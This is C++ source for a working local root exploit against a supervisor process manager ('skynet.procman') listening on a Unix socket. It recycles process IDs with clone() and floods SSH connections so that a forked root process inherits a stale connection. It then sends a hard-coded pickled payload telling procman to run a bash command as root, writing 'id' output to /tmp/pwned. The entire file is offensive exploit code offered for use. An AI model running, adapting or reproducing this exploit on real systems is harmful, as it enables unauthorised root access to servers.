#include <sys/types.h>
#include <cstdlib>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/syscall.h>
#include <sched.h>

#include <util/stream/output.h>
#include <util/network/socket.h>
#include <util/network/pair.h>
#include <util/system/env.h>
#include <util/generic/scope.h>
#include <util/string/escape.h>
#include <util/thread/pool.h>

#include <library/cpp/getopt/last_getopt.h>


namespace {
    const char kProcManSock[] = "/Berkanavt/supervisor/var/procman/skynet.procman.sock";
    const int kReportEvery = 64 << 10;

    constexpr TStringBuf kException = "Exception";
    constexpr TStringBuf kPayload =
            "PYRO\0,\0\4\0\0\0\1\0\0\0\2125\244\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\200\2(U\16skynet.procmanq\1U\6createq\2]q\3(U\t/bin/bashq\4U\2-cq\5U#date > /tmp/pwned; id >> /tmp/pwnedq\6e\205q\7}q\10(U\vkeeprunningq\t\211U\4userq\nU\4rootq\vutq\f."sv
    ;
    const int kHostConnDuration = 1;

    char exit_stack[8192];

    int exit_fn(void *dummy) {
        Y_UNUSED(dummy);
        syscall(__NR_exit, 0);
        return 0;
    }

    void cyclePIDs(ui32 targetPID, ui32 pidStopDistance) {
        Cout << "current pid is " << getpid() << "...";
        Cout.Flush();

        ui32 child;
        ui32 minPID = targetPID - pidStopDistance;

        bool overlap = false;
        while (true) {
            child = clone(exit_fn, exit_stack + sizeof(exit_stack),
                          CLONE_FILES | CLONE_FS | CLONE_IO |
                          CLONE_SIGHAND | CLONE_SYSVSEM |
                          CLONE_VM | SIGCHLD, nullptr);

            waitpid(child, nullptr, 0);
            if (child < targetPID && !overlap) {
                overlap = true;
            }

            if (overlap && child >= minPID) {
                break;
            }

            if (child % kReportEvery == 0) {
                Cout << child << "...";
                Cout.Flush();
            }
        }

        Cout << Endl;
        Cout << "closing in to target_pid " << targetPID << ": Got child PID " << child << Endl;
    }

    std::pair<pid_t, int> dialProcMan() {
        int fd = socket(AF_UNIX, SOCK_STREAM | SOCK_CLOEXEC, 0);
        if (fd < 0) {
            ythrow TSystemError() << "can't create socket";
        }

        struct sockaddr_un addr = {};
        memset(&addr, 0, sizeof(struct sockaddr_un));
        addr.sun_family = AF_UNIX;
        strncpy(addr.sun_path, kProcManSock, sizeof(kProcManSock));

        int pid = fork();
        if (pid < 0) {
            ythrow TSystemError() << "can't fork";
        }

        if (pid == 0) {
            connect(fd, (struct sockaddr *) &addr, sizeof(struct sockaddr_un));
            _exit(0);
        }
        waitpid(pid, nullptr, 0);

        return {pid, fd};
    }

    void dialHost(IThreadPool *queue, const TString &target, size_t count) {
        for (size_t i = 0; i < count; ++i) {
            queue->SafeAddFunc([target]() {
                TSocket socket(TNetworkAddress(target, 22), TDuration::Seconds(1));
                sleep(kHostConnDuration);
            });
        }
    }
}

int main(int argc, char **argv) {
    NLastGetopt::TOpts opts = NLastGetopt::TOpts::Default();

    TString hostAddr = GetEnv("PORTO_HOST");
    opts.AddLongOption("host", "host addr to connect for forking")
            .DefaultValue(hostAddr)
            .StoreResult(&hostAddr);

    size_t hostCons = 100;
    opts.AddLongOption("host-cons", "host cons")
            .DefaultValue(hostCons)
            .StoreResult(&hostCons);

    ui32 pidStopDistance = 5000;
    opts.AddLongOption("pid-stop-distance", "pid stop distance")
            .DefaultValue(pidStopDistance)
            .StoreResult(&pidStopDistance);

    NLastGetopt::TOptsParseResult args(&opts, argc, argv);
    if (hostAddr.empty()) {
        Cerr << "--host is required" << Endl;
        return 1;
    }

    // deal with wrap around calculations
    Cout << "skip first 16k pids" << Endl;
    for (ui32 i = 0; i <= (16 << 10); ++i) {
        clone(exit_fn, exit_stack + sizeof(exit_stack),
              CLONE_FILES | CLONE_FS | CLONE_IO |
              CLONE_SIGHAND | CLONE_SYSVSEM |
              CLONE_VM | SIGCHLD, nullptr);
        wait(nullptr);
    }

    Cout << "spawn thread pool for later host connections" << Endl;
    THolder<IThreadPool> hostQueue = CreateThreadPool(hostCons, hostCons + 1);
    Y_DEFER {
        hostQueue->Stop();
    };

    Cout << "call procman" << Endl;
    auto[targetPID, procmanFD] = dialProcMan();
    Cout << "got procman conn fd " << procmanFD << " from pid " << targetPID << Endl;

    Cout << "let's recycle pids" << Endl;
    cyclePIDs(targetPID, pidStopDistance);

    Cout << "read header procman" << Endl;
    TSocket socket(procmanFD);
    Y_DEFER {
        socket.Close();
    };
    char buf[4096];
    // header
    size_t bufLen = socket.Recv(buf, sizeof(buf));
    Cout << "got response from procman: " << EscapeC(buf, bufLen) << Endl;


    Cout << "dial host (connect to '" << hostAddr << ":22' which is forked on accept) && send procman payload" << Endl;
    while (true) {
        dialHost(hostQueue.Get(), hostAddr, hostCons);
        // too lazy to implement signaling
        sleep(1);

        socket.Send(kPayload.data(), kPayload.size());
        bufLen = socket.Recv(buf, sizeof(buf));
        Cout << "got response from procman: " << EscapeC(buf, bufLen > 200 ? 200 : bufLen) << Endl;

        if (!TStringBuf(buf, bufLen).Contains(kException)) {
            Cout << "Boom!!! (or not, I don't known)" << Endl;
            return 0;
        }
    }

    Cout << "something goes wrong :(" << Endl;
    return 1;
}
